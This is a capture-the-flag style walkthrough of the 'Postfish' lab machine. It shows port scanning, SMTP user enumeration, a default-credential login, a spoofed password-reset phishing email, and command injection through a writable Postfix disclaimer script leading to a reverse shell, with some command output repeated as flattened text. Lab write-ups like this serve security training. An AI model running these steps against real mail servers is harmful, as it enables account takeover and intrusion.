Postfish

added the IP and hostname to the hosts file for ease. sudo nano /etc/hosts

I then ran nmap to see which ports were open.

$ sudo nmap -sC -Pn -p- postfish.offsec                                                                    1 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 11:33 EST
Nmap scan report for postfish.offsec (192.168.169.137)
Host is up (0.062s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
25/tcp  open  smtp
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3
|_pop3-capabilities: USER RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE STLS SASL(PLAIN) PIPELINING
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
143/tcp open  imap
|_imap-capabilities: capabilities listed SASL-IR more STARTTLS IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login ID LOGIN-REFERRALS LITERAL+ Pre-login ENABLE OK
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
993/tcp open  imaps
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: capabilities listed ID more IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login LITERAL+ LOGIN-REFERRALS SASL-IR Pre-login ENABLE OK
995/tcp open  pop3s
|_pop3-capabilities: USER CAPA PIPELINING RESP-CODES UIDL SASL(PLAIN) TOP AUTH-RESP-CODE
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time

Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds

cewl http://postfish.off/team.html -m 5 -w team.txt

I use this custom dictionary and run it through smtp-user-enum to find available email accounts on the server. This shows us that we have sales and legal.

smtp-user-enum -U team.txt -t postfish.offsec                                                           
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... team.txt
Target count ............. 1
Username count ........... 75
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 13:10:39 2021 #########
postfish.offsec: Sales exists
postfish.offsec: Legal exists
######## Scan completed at Tue Dec 21 13:10:42 2021 #########
2 results.

75 queries in 3 seconds (25.0 queries / sec)

I also take the team member's names and iterate through common email naming schemes and run this custom dictionary through smtp-user-enum as well. This confirms the accounts naming scheme.

smtp-user-enum -U users.lst -t postfish.offsec                                               
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lst
Target count ............. 1
Username count ........... 40
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 11:57:31 2021 #########
postfish.offsec: claire.madison exists
postfish.offsec: mike.ross exists
postfish.offsec: brian.moore exists
postfish.offsec: sarah.lorem exists
postfish.offsec: claire.madison@postfish.off exists
postfish.offsec: mike.ross@postfish.off exists
postfish.offsec: brian.moore@postfish.off exists
postfish.offsec: sarah.lorem@postfish.off exists
######## Scan completed at Tue Dec 21 11:57:33 2021 #########
8 results.

40 queries in 2 seconds (20.0 queries / sec)

Trying the same username and password I see that sales has the password of sales as well. We use this information to find an email on their inbox about a password reset email that will be coming in the future.

curl -k 'imaps://postfish.offsec/INBOX;MAILINDEX=1' --user sales:sales
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
        id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
        by postfish.off (Postfix) with SMTP id 7712145434
        for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off

Hi Sales team,

We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.

Regards,
IT

We send an email to the user with a link for them to reset their password.

sendemail -t brian.moore@postfish.off -f it@postfish.off -s postfish.off -u "Password Reset" -o tls=no

we get a call back with the user's password

We can then login through ssh as brian

ssh brian.moore@postfish.off

Running LSE I notice a non-usual file that we have access to (/etc/postfix/disclaimer)

Reading about this file and reading the other files called within it we can derive that these files add a disclaimer text to the outgoing emails from two accounts (it@postfish.off and brian.moore@postfish.off). With this information we can try a POC.

I edit the /etc/postfix/disclaimer file and add the command

/usr/bin/ping -c 1 192.168.169.137

and send an email to brian.moore@postfish.off as we did before. As soon as I do, I get a ping packet on my machine (sudo tcpdump ip proto \\icmp -i tun0)

Using this information we modify our file once more and do a reverse shell to our kali box.

Now we have shell access, but this time as the 'filter' user. On here we see that sudo -l gives us sudo access to the /usr/bin/mail.

PreviousPelican NextReadys

Last updated 3 years ago

$ sudo nmap -sC -Pn -p- postfish.offsec 1 ⨯ Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 11:33 EST Nmap scan report for postfish.offsec (192.168.169.137) Host is up (0.062s latency). Not shown: 65528 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA) | 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA) |_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519) 25/tcp open smtp | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING |_ssl-date: TLS randomness does not represent time 80/tcp open http |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 |_pop3-capabilities: USER RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE STLS SASL(PLAIN) PIPELINING | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time 143/tcp open imap |_imap-capabilities: capabilities listed SASL-IR more STARTTLS IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login ID LOGIN-REFERRALS LITERAL+ Pre-login ENABLE OK | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time 993/tcp open imaps | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time |_imap-capabilities: capabilities listed ID more IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login LITERAL+ LOGIN-REFERRALS SASL-IR Pre-login ENABLE OK 995/tcp open pop3s |_pop3-capabilities: USER CAPA PIPELINING RESP-CODES UIDL SASL(PLAIN) TOP AUTH-RESP-CODE | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2021-01-26T10:26:37 |_Not valid after: 2031-01-24T10:26:37 |_ssl-date: TLS randomness does not represent time Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds

smtp-user-enum -U team.txt -t postfish.offsec Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... team.txt Target count ............. 1 Username count ........... 75 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ ######## Scan started at Tue Dec 21 13:10:39 2021 ######### postfish.offsec: Sales exists postfish.offsec: Legal exists ######## Scan completed at Tue Dec 21 13:10:42 2021 ######### 2 results. 75 queries in 3 seconds (25.0 queries / sec)

smtp-user-enum -U users.lst -t postfish.offsec Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... users.lst Target count ............. 1 Username count ........... 40 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ ######## Scan started at Tue Dec 21 11:57:31 2021 ######### postfish.offsec: claire.madison exists postfish.offsec: mike.ross exists postfish.offsec: brian.moore exists postfish.offsec: sarah.lorem exists postfish.offsec: claire.madison@postfish.off exists postfish.offsec: mike.ross@postfish.off exists postfish.offsec: brian.moore@postfish.off exists postfish.offsec: sarah.lorem@postfish.off exists ######## Scan completed at Tue Dec 21 11:57:33 2021 ######### 8 results. 40 queries in 2 seconds (20.0 queries / sec)

curl -k 'imaps://postfish.offsec/INBOX;MAILINDEX=1' --user sales:sales Return-Path: <it@postfish.off> X-Original-To: sales@postfish.off Delivered-To: sales@postfish.off Received: by postfish.off (Postfix, from userid 997) id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC) Received: from x (localhost [127.0.0.1]) by postfish.off (Postfix) with SMTP id 7712145434 for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC) Subject: ERP Registration Reminder Message-Id: <20210331131139.7712145434@postfish.off> Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC) From: it@postfish.off Hi Sales team, We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system. Regards, IT